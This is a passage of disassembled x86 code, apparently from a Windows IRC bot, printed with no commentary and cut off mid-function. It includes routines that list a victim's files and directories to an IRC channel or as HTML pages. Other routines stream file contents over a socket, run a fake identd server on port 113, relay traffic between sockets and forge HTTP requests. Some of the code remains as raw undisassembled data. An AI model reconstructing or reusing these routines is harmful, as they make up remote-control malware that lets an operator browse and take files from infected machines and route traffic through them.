push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_412573
; ---------------------------------------------------------------------------
loc_4125B2: ; CODE XREF: sub_412135+459�j
cmp [ebp+arg_C], ebx
jz loc_4126B2
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push edi
push eax
call sub_41E6FE
add esp, 10h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push edi
push eax
call sub_41E6FE
add esp, 14h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
lea eax, [ebp+var_360]
push eax
call sub_41E1C0
cmp eax, 1Fh
lea eax, [ebp+var_360]
pop ecx
push eax
lea eax, [ebp+var_24C]
jbe short loc_412658
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_41265D
; ---------------------------------------------------------------------------
loc_412658: ; CODE XREF: sub_412135+51A�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_41265D: ; CODE XREF: sub_412135+521�j
push edi
push eax
call sub_41E6FE
add esp, 10h
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push edi
push eax
call sub_41E6FE
add esp, 1Ch
jmp short loc_4126D8
; ---------------------------------------------------------------------------
loc_4126B2: ; CODE XREF: sub_412135+480�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_4126C9: ; CODE XREF: sub_412135+40C�j
lea eax, [ebp+var_24C]
push eax
call sub_41E6FE
add esp, 18h
loc_4126D8: ; CODE XREF: sub_412135+317�j
; sub_412135+44E�j ...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
cmp [ebp+arg_8], ebx
jz short loc_412707
push 7D0h
call ds:dword_42B014 ; Sleep
loc_412707: ; CODE XREF: sub_412135+225�j
; sub_412135+240�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jnz loc_412354
loc_41271F: ; CODE XREF: sub_412135+214�j
push [ebp+var_C]
call ds:dword_42B0A4 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_412762
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_419443
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_419443
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_41E6A6
add esp, 14h
jmp short loc_412790
; ---------------------------------------------------------------------------
loc_412762: ; CODE XREF: sub_412135+5F6�j
cmp [ebp+arg_C], ebx
lea eax, [ebp+var_24C]
jz short loc_41277C
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_412790
; ---------------------------------------------------------------------------
loc_41277C: ; CODE XREF: sub_412135+636�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_41E6A6
add esp, 10h
loc_412790: ; CODE XREF: sub_412135+62B�j
; sub_412135+645�j
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_412135 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 408h
push ebx
push esi
push edi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push dword ptr [ebp+0Ch]
mov edi, 400h
mov [ebp-8], esi
call ds:dword_42B08C ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_41286E
push esi
push ebx
call ds:dword_42B0BC ; GetFileSize
cmp eax, esi
mov [ebp-4], eax
jz short loc_412867
loc_4127FB: ; CODE XREF: seg000:00412865�j
push 400h
lea eax, [ebp-408h]
push esi
push eax
call sub_41E5F0
add esp, 0Ch
cmp edi, [ebp-4]
jbe short loc_412818
mov edi, [ebp-4]
loc_412818: ; CODE XREF: seg000:00412813�j
mov eax, [ebp-4]
push 2
push esi
neg eax
push eax
push ebx
call ds:dword_42B0B8 ; SetFilePointer
push esi
lea eax, [ebp-8]
push eax
push edi
lea eax, [ebp-408h]
push eax
push ebx
call ds:dword_42B080 ; ReadFile
push esi
push edi
lea eax, [ebp-408h]
push eax
push dword ptr [ebp+8]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_412862
call ds:dword_4441C4 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_412867
xor eax, eax
loc_412862: ; CODE XREF: seg000:00412851�j
sub [ebp-4], eax
jnz short loc_4127FB
loc_412867: ; CODE XREF: seg000:004127F9�j
; seg000:0041285E�j
push ebx
call ds:dword_42B004 ; CloseHandle
loc_41286E: ; CODE XREF: seg000:004127E6�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_412873 proc near ; CODE XREF: seg000:00412CA5�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
xor esi, esi
call sub_41E1C0
test eax, eax
pop ecx
jbe short loc_41289C
loc_412886: ; CODE XREF: sub_412873+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_412890
mov byte ptr [esi+edi], 2Fh
loc_412890: ; CODE XREF: sub_412873+17�j
push edi
inc esi
call sub_41E1C0
cmp esi, eax
pop ecx
jb short loc_412886
loc_41289C: ; CODE XREF: sub_412873+11�j
mov eax, edi
pop edi
pop esi
retn
sub_412873 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4128A1 proc near ; CODE XREF: sub_40274D+4FE6�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
push edi
lea eax, [ebp+var_4A0]
push eax
push 101h
call ds:dword_444110 ; WSAStartup
push 6
push 1
push 2
call ds:dword_444100 ; socket
push 10h
mov ebx, eax
xor edi, edi
lea eax, [ebp+var_10]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
push [ebp+arg_14]
mov [ebp+var_10], 2
call ds:dword_444260 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_4022BD
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_41297E
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_41291A
mov eax, offset byte_42B633
loc_41291A: ; CODE XREF: sub_4128A1+72�j
push esi
push [ebp+arg_10]
mov esi, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_110]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41E6FE
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_4441A0 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_41F400
add esp, 0Ch
push edi
push esi
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_444064 ; recv
pop esi
loc_41297E: ; CODE XREF: sub_4128A1+6B�j
push ebx
call ds:dword_444218 ; closesocket
call ds:dword_444224 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_41E6A6
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_4129BE
push edi
push [ebp+arg_8]
lea eax, [ebp+var_310]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 14h
loc_4129BE: ; CODE XREF: sub_4128A1+102�j
pop edi
pop ebx
leave
retn
sub_4128A1 endp
; ---------------------------------------------------------------------------
word_4129C2 dw 0B855h ; DATA XREF: seg000:00412D6F�o
dd 1654h, 8C246C8Dh, 0C04FE8h, 7C458B00h, 0F08B5756h, 0ECB9h
dd 28BD8D00h, 0F3FFFFFCh, 0AC80C7A5h, 1000003h, 8D000000h
dd 0FFFCAC85h, 858D50FFh, 0FFFFFB24h, 0BCA4E850h, 858D0000h
dd 0FFFFFDB0h, 20858D50h, 50FFFFFAh, 0BC91E8h, 83FF3300h
dd 7D3910C4h, 0D8458DD0h, 40680774h, 0EB004348h, 48246805h
dd 0E8500043h, 0BC72h, 466A5959h, 500C458Dh, 43481068h
dd 0BE575700h, 409h, 0C415FF56h, 6A0042B0h, 54458D1Eh
dd 48046850h, 57570043h, 0C015FF56h, 830042B0h, 8DFFBC7Dh
dd 8D505445h, 8D500C45h, 8D505445h, 8D500C45h, 8D505445h
dd 8D500C45h, 1775D845h, 20858D50h, 68FFFFEAh, 434728h
dd 0BC10E850h, 0C4830000h, 0FF18EB24h, 8D50BC75h, 0FFEA2085h
dd 463868FFh, 0E8500043h, 0BBF6h, 8D28C483h, 0FFEA2085h
dd 0E85057FFh, 0B700h, 858D5059h, 0FFFFEA20h, 28B5FF50h
dd 0FFFFFFFCh, 4441A015h, 0D07D3900h, 858D1675h, 0FFFFFB24h
dd 28B5FF50h, 0E8FFFFFCh, 0FFFFFCCAh, 1DEB5959h, 0FA20858Dh
dd 5750FFFFh, 0FC28B5FFh, 858DFFFFh, 0FFFFFB24h, 0F62BE850h
dd 0C483FFFFh, 28B5FF10h, 0FFFFFFFCh, 44421815h, 0C075FF00h
dd 0FF8628E8h, 0FF5759FFh, 42B06815h
db 0, 0CCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp-210h]
push edi
push eax
mov [ebp-4], edi
call sub_41E5F0
mov eax, [ebp+10h]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
push eax
jz short loc_412B60
push offset aS_9 ; "\\%s"
jmp short loc_412B68
; ---------------------------------------------------------------------------
loc_412B60: ; CODE XREF: seg000:00412B57�j
mov byte ptr [eax], 5Ch
push offset aS ; "%s"
loc_412B68: ; CODE XREF: seg000:00412B5E�j
lea eax, [ebp-10Ch]
push eax
call sub_41E6A6
lea eax, [ebp-10Ch]
add esp, 0Ch
push eax
xor esi, esi
xor ebx, ebx
call sub_41E1C0
test eax, eax
pop ecx
jbe short loc_412C03
mov dword ptr [ebp+10h], 2
loc_412B93: ; CODE XREF: seg000:00412C01�j
lea eax, [ebp-10Ch]
push eax
call sub_41E1C0
cmp [ebp+10h], eax
pop ecx
jnb short loc_412BD3
cmp byte ptr [ebp+esi-10Ch], 25h
jnz short loc_412BD3
cmp byte ptr [ebp+esi-10Bh], 32h
jnz short loc_412BD3
cmp byte ptr [ebp+esi-10Ah], 30h
jnz short loc_412BD3
inc esi
inc esi
add dword ptr [ebp+10h], 2
mov byte ptr [ebp+ebx-210h], 20h
jmp short loc_412BED
; ---------------------------------------------------------------------------
loc_412BD3: ; CODE XREF: seg000:00412BA3�j
; seg000:00412BAD�j ...
mov al, [ebp+esi-10Ch]
cmp al, 2Fh
jnz short loc_412BE3
push 5Ch
pop eax
jmp short loc_412BE6
; ---------------------------------------------------------------------------
loc_412BE3: ; CODE XREF: seg000:00412BDC�j
movsx eax, al
loc_412BE6: ; CODE XREF: seg000:00412BE1�j
mov [ebp+ebx-210h], al
loc_412BED: ; CODE XREF: seg000:00412BD1�j
lea eax, [ebp-10Ch]
inc esi
inc dword ptr [ebp+10h]
push eax
inc ebx
call sub_41E1C0
cmp esi, eax
pop ecx
jb short loc_412B93
loc_412C03: ; CODE XREF: seg000:00412B8A�j
lea eax, [ebp-210h]
push eax
push dword ptr [ebp+0Ch]
lea eax, [ebp-314h]
push offset aSS ; "%s%s"
push eax
call sub_41E6A6
lea eax, [ebp-314h]
push offset asc_42CC64 ; "\n"
push eax
call sub_41E7B2
add esp, 18h
lea eax, [ebp-314h]
push eax
call ds:dword_42B050 ; GetFileAttributesA
xor esi, esi
inc esi
cmp eax, 10h
jz short loc_412C51
cmp eax, 0FFFFFFFFh
jnz short loc_412C54
push dword ptr [ebp+8]
jmp short loc_412CD0
; ---------------------------------------------------------------------------
loc_412C51: ; CODE XREF: seg000:00412C45�j
mov [ebp-4], esi
loc_412C54: ; CODE XREF: seg000:00412C4A�j
cmp byte ptr [ebp+ebx-211h], 5Ch
jnz short loc_412C61
mov [ebp-4], esi
loc_412C61: ; CODE XREF: seg000:00412C5C�j
cmp [ebp-4], edi
mov ebx, [ebp+8]
mov [ebp-6C4h], ebx
mov [ebp-318h], edi
jz short loc_412CDB
cmp [ebp+14h], edi
jz short loc_412CCF
lea eax, [ebp-314h]
push offset asc_4348B8 ; "*"
push eax
call sub_41EED0
lea eax, [ebp-314h]
push eax
lea eax, [ebp-640h]
push eax
call sub_41E6A6
lea eax, [ebp-210h]
push eax
call sub_412873
lea eax, [ebp-210h]
push eax
lea eax, [ebp-53Ch]
push eax
call sub_41E6A6
add esp, 1Ch
or dword ptr [ebp-330h], 0FFFFFFFFh
mov [ebp-31Ch], esi
jmp short loc_412D2A
; ---------------------------------------------------------------------------
loc_412CCF: ; CODE XREF: seg000:00412C78�j
push ebx
loc_412CD0: ; CODE XREF: seg000:00412C4F�j
call ds:dword_444218 ; closesocket
jmp loc_412DC0
; ---------------------------------------------------------------------------
loc_412CDB: ; CODE XREF: seg000:00412C73�j
push edi
push edi
push 3
push edi
push esi
push 80000000h
lea eax, [ebp-314h]
push eax
call ds:dword_42B08C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_412D2A
lea eax, [ebp-314h]
push eax
lea eax, [ebp-640h]
push eax
call sub_41E6A6
pop ecx
pop ecx
push edi
push esi
mov [ebp-31Ch], edi
call ds:dword_42B0BC ; GetFileSize
push esi
mov [ebp-330h], eax
call ds:dword_42B004 ; CloseHandle
loc_412D2A: ; CODE XREF: seg000:00412CCD�j
; seg000:00412CF8�j
mov esi, [ebp+18h]
push esi
lea eax, [ebp-8C4h]
push offset unk_434884
push eax
call sub_41E6A6
push edi
lea eax, [ebp-8C4h]
push 3
push eax
call sub_40AE85
mov [ebp-32Ch], eax
imul eax, 234h
add esp, 18h
mov ds:dword_4444EC[eax], esi
lea eax, [ebp-8]
push eax
push edi
lea eax, [ebp-6C4h]
push eax
push offset word_4129C2
push edi
push edi
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp-32Ch]
imul ecx, 234h
cmp eax, edi
mov ds:dword_4444FC[ecx], eax
jnz short loc_412DCF
push ebx
call ds:dword_444218 ; closesocket
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp-8C4h]
push offset unk_43484C
push eax
call sub_41E6A6
lea eax, [ebp-8C4h]
push eax
call sub_417D70
add esp, 10h
loc_412DC0: ; CODE XREF: seg000:00412CD6�j
; seg000:00412DD7�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_412DC7: ; CODE XREF: seg000:00412DD5�j
push 5
call ds:dword_42B014 ; Sleep
loc_412DCF: ; CODE XREF: seg000:00412D90�j
cmp [ebp-318h], edi
jz short loc_412DC7
jmp short loc_412DC0
; ---------------------------------------------------------------------------
byte_412DD9 db 55h, 0B8h, 0F0h ; DATA XREF: sub_40274D+2073�o
; seg000:0040BAFC�o
dd 8D000028h, 0E88C246Ch, 0BC38h, 537C458Bh, 0F08B5756h
dd 0ECB9h, 84BD8D00h, 0F3FFFFF9h, 46F633A5h, 0B089106Ah
dd 3ACh, 458DDB33h, 89505350h, 0D9E86475h, 830000B7h, 0B5FF0CC4h
dd 0FFFFFD14h, 5045C766h, 15FF0002h, 444260h, 26A5653h
dd 52458966h, 0FF545D89h, 44410015h, 83F88B00h, 7D89FFFFh
dd 64840F6Ch, 8B000003h, 0FFFD1C85h, 34C069FFh, 89000002h
dd 4444F4B8h, 8D106A00h, 57505045h, 41E415FFh, 0F8830044h
dd 3C840FFFh, 68000003h, 7FFFFFFFh, 3015FF57h, 83004442h
dd 840FFFF8h, 327h, 5064458Dh, 4667E68h, 15FF5780h, 444094h
dd 0FFFF883h, 30E84h, 59416A00h, 858D5353h, 0FFFFFE38h
dd 0BD895053h, 0FFFFFF50h, 0FF4CB589h, 7D89FFFFh, 40C78B68h
dd 0FF4CB58Dh, 0BD8DFFFFh, 0FFFFFE38h, 0FFA5F350h, 4441B015h
dd 0FFF88300h, 2CE840Fh, 0F6330000h, 8D7C7589h, 0FFFE3885h
dd 0FF5650FFh, 44415C15h, 0FC08500h, 28E84h, 6C753B00h
dd 458D6575h, 858D5060h, 0FFFFFF3Ch, 6C75FF50h, 106045C7h
dd 0FF000000h, 4440BC15h, 0FFF88300h, 265840Fh, 958B0000h
dd 0FFFFFF4Ch, 0D33BC933h, 84390E76h, 0FFFF508Dh, 410574FFh
dd 0F272CA3Bh, 1275CA3Bh, 7340FA83h, 8D84890Dh, 0FFFFFF50h
db 0FFh, 85h
word_412F4E dw 0FF4Ch ; DATA XREF: seg001:off_4392AC�o
dd 453BFFFFh, 2C860F68h, 89000002h, 24E96845h, 0BF000002h
dd 1000h, 84858D57h, 53FFFFD7h, 0B67AE850h, 8D570000h
dd 0FFE78485h, 0E85053FFh, 0B66Ch, 5318C483h, 84858D57h
dd 50FFFFD7h, 6415FF56h, 85004440h, 56517FC0h, 421815FFh
dd 0C0330044h, 0FF4C9D39h, 860FFFFFh, 1D7h, 5085B439h
dd 74FFFFFFh, 853B401Dh, 0FFFFFF4Ch, 0C0E9EE72h, 8B000001h
dd 0FF54858Ch, 8C89FFFFh, 0FFFF5085h, 8D8B40FFh, 0FFFFFF4Ch
dd 72C13B49h, 4C8DFFE6h, 0E9FFFFFFh, 19Bh, 10468h, 34858D00h
dd 53FFFFFDh, 0B5F2E850h, 858D0000h, 0FFFFD784h, 705D8950h
dd 0B1E8F633h, 830000B1h, 0C08510C4h, 16D860Fh, 458B0000h
dd 5848A70h, 0FFFFD784h, 84880A3Ch, 0FFE78435h, 8B850FFFh
dd 0BE000000h, 4348ECh, 0E784858Dh, 5056FFFFh, 0C04BE8h
dd 59C08500h, 8D487459h, 0FFE78485h, 69E850FFh, 830000B1h
dd 765905F8h, 0FCE0B836h, 50500042h, 0E784858Dh, 5056FFFFh
dd 0C01FE8h, 50595900h, 0C017E8h, 50595900h, 0B731E8h
dd 858D5000h, 0FFFFFD34h, 0BE32E850h, 0C4830000h, 8D17EB10h
dd 0FFE78485h, 48E868FFh, 0E8500043h, 0B8ECh, 5959C085h
dd 8D573374h, 0FFE78485h, 0E85053FFh, 0B538h, 830CC483h
dd 45FFFFCEh, 84858D70h, 50FFFFD7h, 0B0F2E846h, 45390000h
dd 820F5970h, 0FFFFFF42h, 0AAE9h, 4C8D8B00h, 33FFFFFFh
dd 76CB3BC0h, 85948B33h, 0FFFFFF50h, 747C553Bh, 0C13B401Ch
dd 20EBEF72h, 54858C8Bh, 89FFFFFFh, 0FF50858Ch, 8D8BFFFFh
dd 0FFFFFF4Ch, 0C13B4940h, 8DFFE672h, 0FFFFFF4Ch, 0FC10858Dh
dd 0E850FFFFh, 0B098h, 858DF08Bh, 0FFFFFD34h, 0B08AE850h
dd 0F0030000h, 104FE81h, 59590000h, 458D3C73h, 7E685070h
dd 0FF800466h, 5D897C75h, 9415FF70h, 0FF004440h, 0FFFD1CB5h
dd 34858DFFh, 0FFFFFFFDh, 0FFFD28B5h, 858D50FFh, 0FFFFFC10h
dd 7C75FF50h, 0FFF9B1E8h, 14C483FFh, 75FF09EBh, 1815FF7Ch
dd 8B004442h, 3B467C75h, 75896875h, 4C860F7Ch, 6AFFFFFDh
dd 53535941h, 0FE38858Dh, 5053FFFFh, 0E968458Bh, 0FFFFFD13h
dd 0FF6C7D8Bh, 4441C415h, 858D5000h, 0FFFFF784h, 4348C068h
dd 0DFE85000h, 830000B4h, 9D390CC4h, 0FFFFFD24h, 0FF532375h
dd 0FFFD20B5h, 84858DFFh, 50FFFFF7h, 0F988858Dh, 0FF50FFFFh
dd 0FFF984B5h, 0E049E8FFh, 0C483FFFEh, 84858D14h, 50FFFFF7h
dd 4B6FE8h, 0FF575900h, 44421815h, 1CB5FF00h, 0E8FFFFFDh
dd 0FFFF7F35h, 15FF5359h, 42B068h
db 0CCh
; ---------------------------------------------------------------------------
loc_41321D: ; DATA XREF: sub_40274D+406C�o
; sub_40A263+42C�o
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi
lea eax, [ebp-1Ch]
push esi
push eax
mov [ebp-8], esi
call sub_41E5F0
add esp, 0Ch
push 71h
mov word ptr [ebp-1Ch], 2
call ds:dword_444260 ; htons
push esi
push 1
push 2
mov [ebp-1Ah], ax
mov [ebp-18h], esi
call ds:dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_413390
mov eax, [ebp+8]
imul eax, 234h
mov ds:dword_4444F4[eax], ebx
push edi
lea eax, [ebp-1Ch]
push eax
push ebx
call ds:dword_4441E4 ; bind
cmp eax, 0FFFFFFFFh
jz loc_413390
push 5
push ebx
call ds:dword_444230 ; listen
cmp eax, 0FFFFFFFFh
jz loc_413390
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-2Ch]
push eax
push ebx
mov [ebp-0Ch], edi
call ds:dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_413390
mov edi, 200h
loc_4132C3: ; CODE XREF: seg000:00413385�j
movzx eax, word ptr [ebp-2Ah]
push eax
push dword ptr [ebp-28h]
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp-238h]
push offset dword_434938
push eax
call sub_41E6A6
lea eax, [ebp-238h]
push eax
call sub_417D70
add esp, 14h
push esi
push edi
lea eax, [ebp-238h]
push eax
push dword ptr [ebp-4]
call ds:dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_413370
lea eax, [ebp-238h]
push esi
push eax
call sub_41AC0E
push 0Ch
lea eax, [ebp-38h]
push esi
push eax
call sub_41E5F0
push esi
push esi
lea eax, [ebp-38h]
push 2
push eax
call sub_40AB83
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp-238h]
push edi
push eax
call sub_41E6FE
add esp, 34h
lea eax, [ebp-238h]
push esi
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-238h]
push eax
push dword ptr [ebp-4]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_413370
mov dword ptr [ebp-8], 1
loc_413370: ; CODE XREF: seg000:00413307�j
; seg000:00413367�j
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-2Ch]
push eax
push ebx
call ds:dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jnz loc_4132C3
cmp [ebp-8], esi
jnz short loc_4133B7
loc_413390: ; CODE XREF: seg000:00413264�j
; seg000:00413288�j ...
call ds:dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp-238h]
push offset dword_4348F4
push eax
call sub_41E6A6
lea eax, [ebp-238h]
push eax
call sub_417D70
add esp, 10h
loc_4133B7: ; CODE XREF: seg000:0041338E�j
push ebx
call ds:dword_444218 ; closesocket
push dword ptr [ebp-4]
call ds:dword_444218 ; closesocket
push dword ptr [ebp+8]
call sub_40B149
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
loc_4133D8: ; DATA XREF: seg000:004135B5�o
push ebp
mov ebp, esp
mov eax, 1128h
call sub_41EA20
mov eax, [ebp+8]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp-128h]
rep movsd
mov edi, 1000h
push edi
mov dword ptr [eax+124h], 1
xor ebx, ebx
lea eax, [ebp-1128h]
push ebx
push eax
call sub_41E5F0
mov esi, [ebp-14h]
imul esi, 234h
jmp short loc_41344A
; ---------------------------------------------------------------------------
loc_413422: ; CODE XREF: seg000:00413464�j
push ebx
push eax
lea eax, [ebp-1128h]
push eax
push ds:dword_4444F4[esi]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_413466
push edi
lea eax, [ebp-1128h]
push ebx
push eax
call sub_41E5F0
loc_41344A: ; CODE XREF: seg000:00413420�j
add esp, 0Ch
push ebx
push edi
lea eax, [ebp-1128h]
push eax
push ds:dword_4444F8[esi]
call ds:dword_444064 ; recv
cmp eax, ebx
jg short loc_413422
loc_413466: ; CODE XREF: seg000:0041343A�j
push ds:dword_4444F8[esi]
call ds:dword_444218 ; closesocket
push dword ptr [ebp-14h]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
push ebp
mov eax, 1344h
lea ebp, [esp-74h]
call sub_41EA20
mov eax, [ebp+7Ch]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp-0D0h]
rep movsd
mov edi, [ebp+44h]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+70h], edi
call ds:dword_444100 ; socket
mov esi, eax
xor ebx, ebx
cmp esi, 0FFFFFFFFh
mov [ebp+7Ch], esi
jz loc_4135E8
push 10h
lea eax, [ebp+5Ch]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push dword ptr [ebp+38h]
mov word ptr [ebp+5Ch], 2
call ds:dword_444260 ; htons
mov [ebp+5Eh], ax
lea eax, [ebp-0C8h]
push eax
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+6Ch], eax
jnz short loc_413515
lea eax, [ebp-0C8h]
push eax
call ds:dword_444168 ; gethostbyname
jmp short loc_413523
; ---------------------------------------------------------------------------
loc_413515: ; CODE XREF: seg000:00413504�j
push 2
push 4
lea eax, [ebp+6Ch]
push eax
call ds:dword_4441FC ; gethostbyaddr
loc_413523: ; CODE XREF: seg000:00413513�j
cmp eax, ebx
jz loc_4135E8
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+60h], eax
push 10h
lea eax, [ebp+5Ch]
push eax
push esi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_4135E8
push dword ptr [ebp+40h]
movzx eax, word ptr [ebp+5Eh]
push eax
push dword ptr [ebp+60h]
mov [ebp+54h], ebx
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp-2D0h]
push offset unk_4349A8
push eax
call sub_41E6A6
push esi
lea eax, [ebp-2D0h]
push 18h
push eax
call sub_40AE85
imul edi, 234h
mov ecx, [ebp+40h]
mov [ebp+44h], eax
imul eax, 234h
mov ds:dword_4444EC[eax], ecx
add esp, 20h
lea edi, dword_4444F4[edi]
mov ecx, [edi]
mov ds:dword_4444F8[eax], ecx
lea eax, [ebp+58h]
push eax
push ebx
lea eax, [ebp-0D0h]
push eax
push offset loc_4133D8
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+44h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_41361E
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_434968
call sub_417DE4
pop ecx
pop ecx
loc_4135E8: ; CODE XREF: seg000:004134C9�j
; seg000:00413525�j ...
mov eax, [ebp+70h]
imul eax, 234h
push ds:dword_4444F4[eax]
call ds:dword_444218 ; closesocket
push dword ptr [ebp+7Ch]
call ds:dword_444218 ; closesocket
push dword ptr [ebp+70h]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
loc_413616: ; CODE XREF: seg000:00413621�j
push 32h
call ds:dword_42B014 ; Sleep
loc_41361E: ; CODE XREF: seg000:004135D3�j
cmp [ebp+54h], ebx
jz short loc_413616
mov esi, 1000h
jmp short loc_413641
; ---------------------------------------------------------------------------
loc_41362A: ; CODE XREF: seg000:00413665�j
push ebx
push eax
lea eax, [ebp-12D0h]
push eax
push dword ptr [ebp+7Ch]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4135E8
